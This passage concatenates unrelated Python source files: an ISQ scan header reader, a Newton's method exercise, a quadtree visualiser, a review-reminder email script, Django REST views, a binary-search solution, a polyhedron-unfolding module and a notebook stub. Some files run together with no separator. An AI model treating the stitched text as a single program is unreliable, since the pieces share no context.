    44, 48 and 52. The original sliced only 3 of the 4 bytes ([44:47],
    [48:51], [52:55]), silently dropping the most significant byte — the
    sibling field at [56:60] shows the intended 4-byte width.
    """
    with io.open(filename, 'rb') as f:
        header_bytes = f.read(2048)
    xdim = bytes_to_int(header_bytes[44:48])
    ydim = bytes_to_int(header_bytes[48:52])
    zdim = bytes_to_int(header_bytes[52:56])
    labels = ('xdim', 'ydim', 'zdim')
    values = (xdim, ydim, zdim)
    return dict(zip(labels, values))
def main():
    """Extract one seed-sized subvolume from the sample ISQ scan."""
    scan_path = "data/raw/C0000245_1.ISQ"
    seed_center = (946, 836, 779)
    # alternative seed: (806, 1146, 779)
    seed_radius = 200
    extract_single_seed_stack(scan_path, seed_center, seed_radius)


if __name__ == "__main__":
    main()
|
#A01022285
# Numerical Methods
# August '18'
import numpy as np
import matplotlib.pyplot as plt
def f(x):
    """Target function f(x) = x^3 - cos(x); Newton's method finds its root."""
    return x**3 - np.cos(x)
def Df(x):
    """Analytic derivative f'(x) = 3x^2 + sin(x), used in the Newton update."""
    return 3* x**2 + np.sin(x)
# Newton-Raphson iteration starting from x0 = 1; stop once successive
# estimates differ by less than 1e-6, printing every step.
x0 = 1
i = 1
while True:
    x1 = x0 - f(x0) / Df(x0)
    error = abs(x1 - x0)
    x0 = x1
    print("Iteracion", i, ", raiz aproximada: ",x0)
    i = i + 1
    if error <= 1e-6:
        break
|
#!/usr/bin/env python
import numpy as np
import numba as nb
import pyglet as pgl
from pyglet.gl import *
from time import perf_counter_ns as ns
# Deferred type lets the jitclass field spec refer to Quadtree before the
# class itself exists (it is bound after the class definition below).
_Quadtree = nb.deferred_type()
# numba jitclass field specification.
spec = [
    # Child quadrants; None until the node is subdivided.
    ("NW", nb.optional(_Quadtree)),
    ("NE", nb.optional(_Quadtree)),
    ("SW", nb.optional(_Quadtree)),
    ("SE", nb.optional(_Quadtree)),
    # Stored point; x doubles as a state flag (see Quadtree.__init__).
    ("x", nb.float64),
    ("y", nb.float64),
    # Center and half edge length of this node's square region.
    ("center_x", nb.float64),
    ("center_y", nb.float64),
    ("halfsize", nb.float64)
]
@nb.jitclass(spec)
class Quadtree:
    """Point-region quadtree: each leaf stores at most one point and
    subdivides into four children on overflow."""

    def __init__(self, center_x, center_y, halfsize):
        self.center_x = center_x
        self.center_y = center_y
        self.halfsize = halfsize
        self.NW = None; self.NE = None
        self.SW = None; self.SE = None
        # x is -1 if no point is set
        # -2 if the tree is subdivided
        # >=0 otherwise
        self.x, self.y = -1, -1

    def isSubdivided(self):
        return self.x == -2

    def hasPoint(self):
        return self.x >= 0

    def _insert(self, x, y):
        # Route the point to the child quadrant containing it.
        # Bug fix: the original called a free function ``insert_point``
        # that does not exist at module level (NameError at runtime);
        # the child's method is what was intended.
        if y > self.center_y:
            if x < self.center_x:
                self.NW.insert_point(x, y)
            else:
                self.NE.insert_point(x, y)
        else:
            if x < self.center_x:
                self.SW.insert_point(x, y)
            else:
                self.SE.insert_point(x, y)

    def insert_point(self, x, y):
        '''Insert a point into the quadtree.
        '''
        if not self.hasPoint() and not self.isSubdivided():
            self.x = x
            self.y = y
        elif self.isSubdivided():
            # Bug fix: ``_insert(self, ...)`` referenced a nonexistent
            # free function; call the method instead.
            self._insert(x, y)
        else:
            # Leaf already holds a point: subdivide into four quarter-size
            # children, then push the old point and the new one down.
            cx, cy = self.center_x, self.center_y
            qs = self.halfsize / 2
            self.NW = Quadtree(cx - qs, cy + qs, qs)
            self.NE = Quadtree(cx + qs, cy + qs, qs)
            self.SW = Quadtree(cx - qs, cy - qs, qs)
            self.SE = Quadtree(cx + qs, cy - qs, qs)
            self._insert(self.x, self.y)
            self._insert(x, y)
            self.x = -2
            self.y = -2


_Quadtree.define(Quadtree.class_type.instance_type)
#@nb.njit(nogil=True)
def level_to_color(level):
    """RGB color for a quadtree depth, duplicated once per line endpoint."""
    rgb = [40 * level, 96, 128 - 4 * level]
    return rgb + rgb
#@nb.jit(nogil=True)
def dive_tree(tree: Quadtree, level, lines, line_colors, points):
    '''Performs a DFS-style dive through the quadtree, adding
    found points and lines used for quadrant visualization.
    '''
    # TODO: Current implementation is unsuitable for jit compilation, and thrashes memory.
    # Possible solution: Preallocate a memory pool and keep track of where to place points.
    if tree.isSubdivided():
        cx, cy = tree.center_x, tree.center_y
        hs = tree.halfsize
        # Cross through the quadrant center: horizontal line, then vertical.
        lines.extend((cx - hs, cy, cx + hs, cy))
        lines.extend((cx, cy + hs, cx, cy - hs))
        depth_color = level_to_color(level)
        line_colors.extend(depth_color)
        line_colors.extend(depth_color)
        for child in (tree.NW, tree.NE, tree.SW, tree.SE):
            dive_tree(child, level + 1, lines, line_colors, points)
    elif tree.hasPoint():
        points.extend((tree.x, tree.y))
# Window resolution and number of sample points on the animated curve.
res = np.array([840, 840])
num_points = 600
# Root quadtree square: centered in the window and covering it fully.
center_x = nb.float64(res[0] / 2)
center_y = nb.float64(res[1] / 2)
halfsize = nb.float64(res[0] / 2)
#point_colors = np.random.randint(0, 255, 3*num_points)
point_colors = (192, 192, 192) * num_points
global line_vl
# Quadrant lines are rebuilt every frame in recalc(); start empty.
line_vl = pgl.graphics.vertex_list(0, "v2f")
point_vl = pgl.graphics.vertex_list(num_points, "v2f", ("c3B", point_colors))
win = pgl.window.Window(*res)
glEnable(GL_POINT_SMOOTH)
glPointSize(2)
def recalc(t):
    """Rebuild the quadtree for animation time *t* and refresh both
    vertex lists (curve points and quadrant lines)."""
    tree = Quadtree(center_x, center_y, halfsize)
    xs = np.linspace(0, res[0], num_points)
    # Sine curve whose frequency itself oscillates slowly with t.
    ys = (res[1]/4) * np.sin(1/(84 + 48 * np.sin(t/60)) * (xs)) + res[1]/2
    for x, y in zip(xs, ys):
        # Bug fix: there is no module-level ``insert_point`` function
        # (NameError at runtime); the Quadtree method is what was intended.
        tree.insert_point(x, y)
    lines = []
    line_colors = []
    points = []
    st = ns()
    dive_tree(tree, 0, lines, line_colors, points)
    et = ns()
    print("Dive time:", (et-st)/1e6, "ms")
    point_vl.vertices = points
    global line_vl
    # Rebuild the line vertex list since its length changes every frame.
    line_vl = pgl.graphics.vertex_list(len(lines) // 2, ("v2f", lines), ("c3B", line_colors))
@win.event
def on_draw():
    # Redraw quadrant lines first, then the curve points on top.
    win.clear()
    line_vl.draw(GL_LINES)
    point_vl.draw(GL_POINTS)
# Simulation clock, advanced at 90x real time each scheduled tick.
global t
t = 0
def update(dt):
    global t
    t += dt * 90
    recalc(t)
    # Force an immediate redraw rather than waiting for the next event.
    on_draw()
recalc(0)
# Schedule updates at 144 Hz and enter the pyglet main loop.
pgl.clock.schedule_interval(update, 1/144)
pgl.app.run()
from .CoreManager import CoreManager
from .SceneManager import SceneManager
from .ProjectManager import ProjectManager
|
#!/usr/bin/env python3
from client.quotes_reader import QuotesReader
from client.items_reader import ItemsReader
from client.gsheet_client import GSheetClient
from notify.emailer import Emailer
from conf_reader import ConfReader
from review import Review
import random
from datetime import date
from collections import OrderedDict
def select_quote(quote_reader):
    """Return one quote picked uniformly at random from the reader's quotes."""
    return random.choice(quote_reader.read_quotes())
def send_email(emailer, sender, receiver, msg):
    """Thin wrapper: forward the message to the emailer's send()."""
    emailer.send(sender, receiver, msg)
if __name__ == "__main__":
    # read content
    conf_reader = ConfReader('conf.json')
    msg = ''
    try:
        # Pick the quote of the day from the configured source.
        quote_reader = QuotesReader(conf_reader['quote-url'])
        quote = select_quote(quote_reader)
        quote_str = "Quote of the day: " + "\n" + quote['content'] + " -- " + quote["author"]
        # Pull tracked items from the Google sheet.
        items_reader = ItemsReader(GSheetClient('client/token.json', 'client/credentials.json'))
        daily = items_reader.read_daily()
        confs = items_reader.read_conf()
        laws = items_reader.read_laws()
        review_items = items_reader.read_review_backlog()
        review = Review()
        # fill unscheduled reviews, merge, get todo list
        review.fill_review_dates(confs, review_items)
        review.merge_review_items(daily, confs, review_items)
        todo_list = review.reschedule_and_generate_todo(confs, review_items)
        # write review schedules back to sheet
        items_reader.write_review_backlog(review.to_table(review_items))
        # send email
        greetings_str = "Hi,\n"
        close_str = "Thanks,\nBot\n\nP.S. remember to update your progress here:\nhttps://docs.google.com/spreadsheets/d/1hloMXB_eL1f_OWpZR3qDSwc51AJQjLslr_yNR0u7n8c/edit"
        if len(todo_list) > 0:
            todo_list_str = "\n - ".join(todo_list)
            todo_list_str = "Consider reviewing the following today:\n - " + todo_list_str
        else:
            todo_list_str = "Looks like there are no items to review today.\n"
        # Include only laws whose active window covers today.
        laws_str = 'Laws enacted:\n'
        for law in laws:
            if law['start_date'] <= date.today() and law['end_date'] >= date.today():
                laws_str += ' - ' + law['law'] + ' : ' + law['description'] + '\n'
        today_str = date.today().strftime("%B %d %Y")
        msg = 'Subject: {}\n\n{}\n{}\n\n{}\n\n{}\n\n{}'.format('Issues for ' + today_str,
                                                               greetings_str,
                                                               todo_list_str,
                                                               quote_str.encode('utf-8').decode('unicode_escape'),
                                                               laws_str,
                                                               close_str)
        if __debug__:
            print(msg)
    except (KeyboardInterrupt, SystemExit):
        raise
    except Exception as e:
        # Any failure is reported by email instead of crashing silently.
        msg = 'Subject: {}\n\n{}'.format('An exception has occurred in issue-tracker', str(e))
    emailer = Emailer(conf_reader['email-user'], conf_reader['email-pwd'])
    send_email(emailer, conf_reader['email-sender'], [conf_reader['email-recipient']], msg)
|
# Django
from django.contrib.auth import login
from django.contrib.auth.models import User
from django.http.response import JsonResponse
from django.shortcuts import render

# Third-party: Django REST framework / knox
from knox.models import AuthToken
from rest_framework import filters, generics, permissions, status, viewsets
from rest_framework.authentication import TokenAuthentication
from rest_framework.authtoken.serializers import AuthTokenSerializer
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.decorators import api_view
from rest_framework.parsers import JSONParser
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.settings import api_settings

# Local application
from . import models, permis, serializers
from .models import Feeds
from .serializers import ChangePasswordSerializer, FeedSerializer
#from .serializers import UserSerializer, RegisterSerializer
#from knox.views import LoginView as KnoxLoginView
class CreateTokenView(ObtainAuthToken):
    """Issue a DRF auth token for valid username/password credentials.

    POST ``username``/``password``; responds with ``{"token": ...}``.
    """
    # Fix: the original referenced the undefined name ``AuthSerializer``
    # (NameError at class definition) and misspelled ``renderer_classes``
    # as ``render_classes`` (a silently ignored attribute).
    # ``AuthTokenSerializer`` is DRF's stock credentials serializer and is
    # already imported (and otherwise unused) by this module.
    serializer_class = AuthTokenSerializer
    renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
class ChangePasswordView(generics.UpdateAPIView):
    """Endpoint allowing an authenticated user to change their own password."""

    serializer_class = ChangePasswordSerializer
    model = models.UserProfile
    permission_classes = (permis.UpdateOwnPassword,)

    def get_object(self, queryset=None):
        """Always operate on the requesting user, not a URL-addressed object."""
        return self.request.user

    def update(self, request, *args, **kwargs):
        """Verify the old password, then hash and store the new one."""
        self.object = self.get_object()
        serializer = self.get_serializer(data=request.data)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        # Reject the request unless the supplied old password matches.
        if not self.object.check_password(serializer.data.get("old_password")):
            return Response(
                {"old_password": ["Wrong password."]},
                status=status.HTTP_400_BAD_REQUEST,
            )
        # set_password hashes before storing; the raw string is never persisted.
        self.object.set_password(serializer.data.get("new_password"))
        self.object.save()
        return Response(
            {
                'status': 'success',
                'code': status.HTTP_200_OK,
                'message': 'Password updated successfully',
                'data': [],
            }
        )
@api_view(['GET', 'POST', 'DELETE'])
def feeds_list(request):
    """List, create, or bulk-delete feeds.

    GET    -> all feeds, optionally filtered by ``?title=`` substring.
    POST   -> create a feed from the JSON request body.
    DELETE -> remove every feed.
    """
    if request.method == 'GET':
        feeds = Feeds.objects.all()
        title = request.GET.get('title', None)
        if title is not None:
            feeds = feeds.filter(title__icontains=title)
        feeds_serializer = FeedSerializer(feeds, many=True)
        return JsonResponse(feeds_serializer.data, safe=False)
    elif request.method == 'POST':
        # Fix: POST and DELETE were declared in @api_view but never handled,
        # so those requests fell through and returned None (a 500 error).
        feed_data = JSONParser().parse(request)
        feeds_serializer = FeedSerializer(data=feed_data)
        if feeds_serializer.is_valid():
            feeds_serializer.save()
            return JsonResponse(feeds_serializer.data, status=status.HTTP_201_CREATED)
        return JsonResponse(feeds_serializer.errors, status=status.HTTP_400_BAD_REQUEST)
    elif request.method == 'DELETE':
        # QuerySet.delete() returns (total_deleted, per-model dict).
        count = Feeds.objects.all().delete()
        return JsonResponse(
            {'message': '{} Feeds are deleted successfully'.format(count[0])},
            status=status.HTTP_204_NO_CONTENT,
        )
@api_view(['GET', 'PUT', 'DELETE'])
def feed_detail(request, pk):
    """Retrieve, update, or delete the single feed identified by ``pk``."""
    try:
        feed = Feeds.objects.get(pk=pk)
    except Feeds.DoesNotExist:
        return JsonResponse({'message': 'The Feed does not exist'}, status=status.HTTP_404_NOT_FOUND)
    if request.method == 'GET':
        feeds_serializer = FeedSerializer(feed)
        return JsonResponse(feeds_serializer.data)
    elif request.method == 'PUT':
        feed_data = JSONParser().parse(request)
        feeds_serializer = FeedSerializer(feed, data=feed_data)
        if feeds_serializer.is_valid():
            feeds_serializer.save()
            return JsonResponse(feeds_serializer.data)
        return JsonResponse(feeds_serializer.errors, status=status.HTTP_400_BAD_REQUEST)
    elif request.method == 'DELETE':
        # Fix: the original ran Feeds.objects.all().delete() here, wiping the
        # entire table from a single-object endpoint. Delete only this feed.
        feed.delete()
        return JsonResponse(
            {'message': 'Feed was deleted successfully'},
            status=status.HTTP_204_NO_CONTENT,
        )
class UserProfileViewSet(viewsets.ModelViewSet):
    """CRUD API for user profiles; users may only update their own profile."""

    serializer_class = serializers.UserProfileSerializer
    # Fix: the Django model manager is ``objects`` — ``UserProfile.object``
    # raises AttributeError as soon as the queryset is evaluated.
    queryset = models.UserProfile.objects.all()
    authentication_classes = (TokenAuthentication,)
    permission_classes = (permis.UpdateOwnProfile,)
    filter_backends = (filters.SearchFilter,)
    search_fields = ('username', 'email',)
|
# Read problem input: N values and K total decrements to distribute.
n, k = map(int, input().split())
heights = list(map(int, input().split()))

# Binary search the smallest cap `hi` such that lowering every value to
# at most `hi` consumes at least K decrements in total.
lo, hi = 0, 10 ** 18
while hi - lo > 1:
    mid = (lo + hi) // 2
    used = sum(min(h, mid) for h in heights)
    if used >= k:
        hi = mid
    else:
        lo = mid

# Spend the decrements needed to bring everything down to level hi-1 ...
k -= sum(min(h, hi - 1) for h in heights)
heights = [h - min(h, hi - 1) for h in heights]

# ... then hand out the remaining decrements one at a time, left to right,
# skipping entries that already reached zero.
idx = 0
while k > 0:
    if heights[idx] > 0:
        heights[idx] -= 1
        k -= 1
    idx += 1
print(*heights)
from graph import Graph
from faces import Face
import polyhedra_generation
from component import Component
from component_node import ComponentNode
import json
import numpy as np
class Polyhedron(object):
    """An axis-aligned polyhedron assembled from FOLD-format component files.

    NOTE(review): this module targets Python 2 (`xrange`, a print statement
    in write_to_off, and `dict.keys()[0]` in create_unfolding_tree).
    """
    def __init__(self, vertices=None, faces=None, filelist=None):
        """
        initialize a polyhedron either with a list of vertices and faces OR
        a list of FOLD files where each file is a separate component of the polyhedron
        faces - list of Face objects
        faces_vertices - list of indices into self.vertices defining each face
        vertices - list of coordinates (np array) of each vertex
        components - list of lists indices into self.faces where each list of indices defines a component
        """
        if vertices is not None and faces is not None:
            self.faces = faces
            self.vertices = vertices
        elif filelist is not None:
            self.components = []
            total_faces = 0
            # Merge all component FOLD files into a single "tmp.fold" and
            # remember which face-index range belongs to each component.
            for f in range(len(filelist)):
                with open(filelist[f]) as f_o:
                    data = json.load(f_o)
                faces, _, _, _ = self.parse_fold_file(filelist[f])
                self.components.append(range(total_faces, total_faces+len(faces)))
                total_faces += len(faces)
                if f == 0:
                    polyhedra_generation.create_fold_file("tmp.fold", data)
                else:
                    polyhedra_generation.create_fold_file("tmp.fold", data, append=True)
            self.faces, self.faces_vertices, self.vertices, self.edges = self.parse_fold_file("tmp.fold")
        else:
            raise Exception("must pass in either both vertices and faces or filename(s) to constructor")
        # Subdivide faces/edges along the grid of planes induced by all
        # vertex coordinates, then re-parse the subdivided model.
        faces_vertices, edges_vertices, vertices_coords = self.grid_divide(self.faces_vertices, self.edges, self.vertices)
        polyhedra_generation.create_fold_file("tmp2.fold", {'faces_vertices': faces_vertices, 'edges_vertices': edges_vertices, 'vertices_coords': vertices_coords})
        self.faces, self.faces_vertices, self.vertices, self.edges = self.parse_fold_file("tmp2.fold")
        self.primal_graph = self.create_primal_graph()
        self.dual_graph = self.create_dual_graph()
        self.layers = self.get_layers()
        # Collapse the dual graph between each pair of consecutive y-layers:
        # every connected group of faces between two layers becomes one
        # Component vertex in the component graph.
        all_faces = self.dual_graph.get_V()
        component_graph = self.dual_graph.copy()
        for i in xrange(len(self.layers) - 1):
            faces_between = [key for key in all_faces if all_faces[key].between_layers(self.layers[i + 1], self.layers[i])]
            subgraph_between = self.dual_graph.subgraph(faces_between)
            for face in faces_between:
                if face not in component_graph.get_V():
                    continue
                connections = subgraph_between.get_reachable(face)
                component_dual_graph = subgraph_between.subgraph(connections)
                component = Component(component_dual_graph, self.layers[i + 1], self.layers[i])
                component_graph = component_graph.combine_vertices(connections, component)
        self.component_graph = component_graph
        self.unfolding_tree = self.create_unfolding_tree()
    def parse_fold_file(self, filename):
        """
        parse the fold file and build Face objects with axis-aligned normals
        :param filename: file name (str) of the .fold file
        :return: tuple (faces, faces_vertices, vertices_coords, edges_vertices)
        """
        with open(filename) as f:
            data = json.load(f)
        vertices_coords = data["vertices_coords"]
        faces_vertices = data["faces_vertices"]
        edges_vertices = data["edges_vertices"]
        faces = []
        for f in faces_vertices:
            vertices = [np.array(vertices_coords[i]) for i in f]
            # determine the normal direction of the face
            direction = np.cross(vertices[1] - vertices[0], vertices[3] - vertices[0])
            # NOTE(review): np.float is deprecated/removed in NumPy >= 1.24
            direction = direction.astype(np.float)
            direction /= np.linalg.norm(direction)
            direction_str = None
            # Snap the unit normal to one of the six axis directions; the .9
            # threshold tolerates floating-point error for axis-aligned faces.
            if abs(direction[0]) > .9:
                if direction[0] < 0:
                    direction_str = "-x"
                else:
                    direction_str = "+x"
            elif abs(direction[1]) > .9:
                if direction[1] < 0:
                    direction_str = "-y"
                else:
                    direction_str = "+y"
            elif abs(direction[2]) > .9:
                if direction[2] < 0:
                    direction_str = "-z"
                else:
                    direction_str = "+z"
            faces.append(Face(vertices, direction_str))
        return faces, faces_vertices, vertices_coords, edges_vertices
    def grid_divide(self, faces, edges, vertices):
        """Cut every edge/face along each axis-aligned plane that passes
        through any existing vertex coordinate, so all faces become grid
        cells. Mutates and returns (faces, edges, vertices)."""
        all_vertices = vertices
        all_edges = edges
        all_faces = faces
        # cuts[d] = set of all distinct coordinates along axis d.
        cuts = [set(), set(), set()]
        for v in all_vertices:
            cuts[0].add(v[0])
            cuts[1].add(v[1])
            cuts[2].add(v[2])
        for d in xrange(len(cuts)):
            for cut in cuts[d]:
                new_vertices = []
                new_edges = []
                new_faces = []
                cut_edges = []
                old_faces = []
                # Split every edge that strictly crosses the cut plane.
                for e in all_edges:
                    if all_vertices[e[0]][d] == all_vertices[e[1]][d]:
                        continue
                    v_1 = min(all_vertices[e[0]][d], all_vertices[e[1]][d])
                    v_2 = max(all_vertices[e[0]][d], all_vertices[e[1]][d])
                    if v_1 < cut and v_2 > cut:
                        new_vertex = list(all_vertices[e[0]])
                        new_vertex[d] = cut
                        new_vertex_id = len(all_vertices) + len(new_vertices)
                        new_vertices.append(new_vertex)
                        new_edges.extend([[e[0], new_vertex_id], [e[1], new_vertex_id]])
                        cut_edges.append(e)
                # Any face containing two cut edges is split in two along the
                # segment joining the two new vertices.
                for i in xrange(len(new_vertices)):
                    for j in xrange(len(new_vertices)):
                        if i >= j:
                            continue
                        for f in all_faces:
                            if self.e_in_f_FOLD(cut_edges[i], f) and self.e_in_f_FOLD(cut_edges[j], f):
                                new_edges.append([len(all_vertices) + i, len(all_vertices) + j])
                                old_faces.append(f)
                                new_face1, new_face2 = self.split_FOLD_face(f, len(all_vertices) + i, len(all_vertices) + j, cut_edges[i], cut_edges[j])
                                new_faces.extend([new_face1, new_face2])
                                # break
                all_vertices.extend(new_vertices)
                for ce in cut_edges:
                    all_edges.remove(ce)
                all_edges.extend(new_edges)
                for of in old_faces:
                    all_faces.remove(of)
                all_faces.extend(new_faces)
        all_faces = self.remove_duplicate_faces(all_faces, all_vertices)
        return all_faces, all_edges, all_vertices
    def e_in_f_FOLD(self, e, f):
        """Return True if both endpoints of edge e belong to FOLD face f."""
        if e[0] in f and e[1] in f:
            return True
        return False
    # v1 and v2 are vertex ids (not actual vertex)
    def split_FOLD_face(self, f, v1, v2, e1, e2):
        """Split quad face f into two quads along the segment v1-v2, where
        v1 lies on edge e1 and v2 lies on edge e2 of the face."""
        for i in xrange(len(f)):
            if f[i] in e1 and f[(i + 1) % len(f)] in e1:
                new_face1 = [f[i], v1, v2, f[i - 1]]
                new_face2 = [v1, f[(i + 1) % len(f)], f[(i + 2) % len(f)], v2]
                break
            elif f[i] in e2 and f[(i + 1) % len(f)] in e2:
                new_face1 = [f[i], v2, v1, f[i - 1]]
                new_face2 = [v2, f[(i + 1) % len(f)], f[(i + 2) % len(f)], v1]
                break
        return new_face1, new_face2
    def remove_duplicate_faces(self, faces, vertices):
        """Drop interior faces: when more than two axis-normal faces project
        onto the same footprint along an axis, keep only the outermost two."""
        extra_faces = []
        for d in xrange(3):
            for i in xrange(len(faces)):
                if faces[i] in extra_faces:
                    continue
                # Only consider faces lying flat in a plane normal to axis d.
                if len(set([vertices[v][d] for v in faces[i]])) != 1:
                    continue
                projectable = [faces[i]]
                for j in xrange(i + 1, len(faces)):
                    if faces[j] in extra_faces:
                        continue
                    if len(set([vertices[v][d] for v in faces[j]])) != 1:
                        continue
                    if self.faces_projectable(faces[i], faces[j], d, vertices):
                        projectable.append(faces[j])
                if len(projectable) > 2:
                    projectable.sort(key=lambda x: vertices[x[0]][d])
                    extra_faces.extend(projectable[1:-1])
        return [f for f in faces if f not in extra_faces]
    # returns true if f1 and f2 projected along axis are equivalent
    # only true if f1 and f2 have normals along axis
    def faces_projectable(self, f1, f2, axis, vertices):
        f1_proj = []
        for v_id in f1:
            v = list(vertices[v_id])
            del v[axis]
            f1_proj.append(v)
        f2_proj = []
        for v_id in f2:
            v = list(vertices[v_id])
            del v[axis]
            f2_proj.append(v)
        for p in f1_proj:
            if p not in f2_proj:
                return False
        return True
    def create_primal_graph(self):
        """
        create primal graph, where nodes are vertices and edges are edges in the polyhedron
        :return: Graph object
        """
        edges = set()
        for face in self.faces_vertices:
            for i in range(len(face)):
                next_v = (i+1) % len(face)
                # Add each undirected edge once, regardless of orientation.
                if (face[i], face[next_v]) not in edges and (face[next_v], face[i]) not in edges:
                    edges.add((face[i], face[next_v]))
        # convert set of tuples to list of lists
        edges = list(edges)
        edges = [list(e) for e in edges]
        return Graph(self.vertices, E_list=edges)
    def create_dual_graph(self):
        """
        creates a dual graph from a list of faces. Nodes are faces and edges exist between nodes if the two faces
        are adjacent on the polyhedron (share an edge)
        :return: Graph object
        """
        edges = []
        for u in range(len(self.faces)):
            for v in range(u, len(self.faces)):
                # check to see how many vertices are shared between face u and face v, 6 unique vertices means adjacent
                # (two quads = 8 vertex slots; sharing exactly an edge leaves 6
                # distinct vertices, and u == v yields 4, so no self-loops)
                if len(set(self.faces[u].get_vertices(as_tuple=True) + self.faces[v].get_vertices(as_tuple=True))) == 6:
                    edges.append([u, v])
        return Graph(self.faces, E_list=edges)
    def write_dual_graph(self, filename):
        """
        write dual graph to FOLD format in linkage form for visualization
        :param filename: string
        :return: None
        """
        data_out = {"vertices_coords": [],
                    "edges_vertices": []}
        for u in self.dual_graph.E:
            # Represent each face by its center point.
            center = self.dual_graph.get_V()[u].get_center()
            data_out["vertices_coords"].append([x for x in center])
            for v in self.dual_graph.E[u]:
                data_out["edges_vertices"].append([u, v])
        polyhedra_generation.create_fold_file(filename, data_out, frame_class="linkage")
    # returns a list of layers as a list of y-values
    def get_layers(self):
        y_values = [vertex[1] for vertex in self.vertices]
        return sorted(list(set(y_values)))
    def create_unfolding_tree(self):
        """Root the component graph at an arbitrary component and build the
        unfolding tree by recursively attaching bridged components."""
        components_dict = self.component_graph.get_V()
        # NOTE: dict.keys()[0] is Python 2 only (keys() is a view in Py3).
        root = components_dict.keys()[0]
        root_component = self.component_graph.get_vertex(root)
        root_node = ComponentNode(root_component)
        remaining = [c for c in components_dict if c != root]
        root_node, _ = self.create_unfolding_subtree(root_node, remaining)
        return root_node
    def create_unfolding_subtree(self, root_node, remaining_components):
        """Attach every still-unplaced component reachable from root_node via
        a bridge; returns (root_node, components still unplaced)."""
        remaining = remaining_components
        for c in remaining_components:
            if not remaining:
                break
            if c not in remaining:
                continue
            component = self.component_graph.get_vertex(c)
            bridge = self.get_bridge(root_node.component, component)
            if not bridge:
                continue
            remaining.remove(c)
            c_node = ComponentNode(component)
            child, remaining = self.create_unfolding_subtree(c_node, remaining)
            # bridge[0] lives in the parent component, bridge[1] in the child.
            child.add_parent_bridge(bridge[1])
            root_node.add_child(child)
            root_node.add_child_bridge(bridge[0])
        return root_node, remaining
    # returns the bridge connecting component c1 and component c2
    # returned as a list of length 2 of lists where the first sublist is the portion of the bridge in c1 as a sequence/path of faces and the second sublist is the portion not in c1
    def get_bridge(self, c1, c2):
        # Pick the y-layer shared by the two components.
        if c1.y == c2.y_minus_1:
            y = c1.y
        else:
            y = c1.y_minus_1
        c1_faces = c1.get_faces()
        c2_faces = c2.get_faces()
        # Only z-normal faces can start/end a bridge.
        c1_z = [face for face in c1_faces if c1.get_face(face).direction == '+z' or c1.get_face(face).direction == '-z']
        c2_z = [face for face in c2_faces if c2.get_face(face).direction == '+z' or c2.get_face(face).direction == '-z']
        all_faces_dict = self.dual_graph.get_V()
        y_faces = [face for face in all_faces_dict if all_faces_dict[face].in_layer(y)]
        face_subgraph = self.dual_graph.subgraph(c1_z + c2_z + y_faces)
        c2_z_set = set(c2_z)
        # BFS from each candidate start face in c1 toward any face of c2,
        # restricted to "straight" transitions within the shared layer.
        for face in c1_z:
            layers = [[face]]
            all_faces = [face]
            while layers[-1]:
                next_layer = []
                for vertex in layers[-1]:
                    connections = face_subgraph.get_connections(vertex)
                    connections = [c for c in connections if c not in all_faces and self.path_is_straight(face_subgraph.get_vertex(vertex), face_subgraph.get_vertex(c))]
                    all_faces.extend(connections)
                    if not c2_z_set.isdisjoint(connections):
                        # Reached c2 -- keep only the arrival face and stop.
                        for c in connections:
                            if c in c2_z_set:
                                next_layer = [c]
                                break
                        break
                    next_layer.extend([c for c in connections if face_subgraph.get_V()[c].in_layer(y)])
                layers.append(next_layer)
                if next_layer and next_layer[0] in c2_z_set:
                    break
            if layers[-1] and layers[-1][0] in c2_z_set:
                break
        if not layers[-1]:
            return []
        # Walk the BFS layers backwards to reconstruct the face path.
        path = []
        path.append(layers[-1][0])
        prev = layers[-1][0]
        for i in reversed(xrange(len(layers) - 1)):
            connections = face_subgraph.get_connections(prev)
            for face in layers[i]:
                if face in connections and self.path_is_straight(face_subgraph.get_vertex(prev), face_subgraph.get_vertex(face)):
                    path.insert(0, face)
                    prev = face
                    break
        c1_bridge = [path[0]]
        c2_bridge = path[1:]
        '''
        for face in path:
            if face in c1_faces:
                c1_bridge.append(face)
            else:
                c2_bridge.append(face)
        '''
        return [c1_bridge, c2_bridge]
    # returns common edge between 2 faces
    def get_common_edge(self, f1, f2):
        f1_vertices = f1.get_vertices(as_tuple=True)
        f2_vertices = f2.get_vertices(as_tuple=True)
        common = []
        for v in f1_vertices:
            if v in f2_vertices:
                common.append(v)
        return common
    # returns true if path is straight
    def path_is_straight(self, f1, f2):
        common = self.get_common_edge(f1, f2)
        # NOTE(review): equal first coordinates of the shared edge's endpoints
        # (an edge parallel to the x axis is ruled out) is treated as "not
        # straight" -- confirm intended geometry against Face/Graph helpers.
        if common[0][0] == common[1][0]:
            return False
        else:
            return True
    def write_to_off(self, out_filename):
        """
        output this polyhedron as an .off file
        :param out_filename: (str) filename of output .off file
        :return: None
        """
        nv, nt = len(self.vertices), len(self.faces)*2 # will split each face into 2 triangles
        tri = [] # list of triangles (indices into vertex array)
        for v1, v2, v3, v4 in self.faces_vertices:
            # Fan-triangulate each quad into two triangles.
            tri.append([v1, v2, v3])
            tri.append([v1, v3, v4])
        with open(out_filename, 'w') as out:
            out.write("OFF\n")
            out.write("%s %s 0\n" % (nv, nt))
            for v in self.vertices:
                out.write("%s %s %s\n" % (v[0], v[1], v[2]))
            for f in tri:
                out.write("3 %s %s %s\n" % (f[0], f[1], f[2]))
        print "wrote %s vertices and %s faces to %s" % (nv, nt, out_filename)
if __name__ == "__main__":
    # Build a two-component polyhedron and exercise strip unfolding on
    # component 5, then dump the result as an OFF mesh.
    poly = Polyhedron(filelist=["../data/test/unit_cube_open.fold", "../data/test/rect_box.fold"])
    comp = poly.component_graph.get_V()[5]
    # comp.unfold_strip_leaf(11, "-y")
    comp.unfold_strip_intermediate([13, 15, 14], ["-y", "+y", "-y"], 11, "+y", [2, 2, 1])
    # comp.unfold_strip_root(12, "-y", 2)
    poly.write_to_off("../out/poly.off")
    #poly = Polyhedron(filelist=["../data/boxes2.fold"])
    #poly = Polyhedron(filelist=["../data/the_box.fold"])
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.5.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import pandas as pd
from matplotlib import pyplot as plt
# # Intro
#
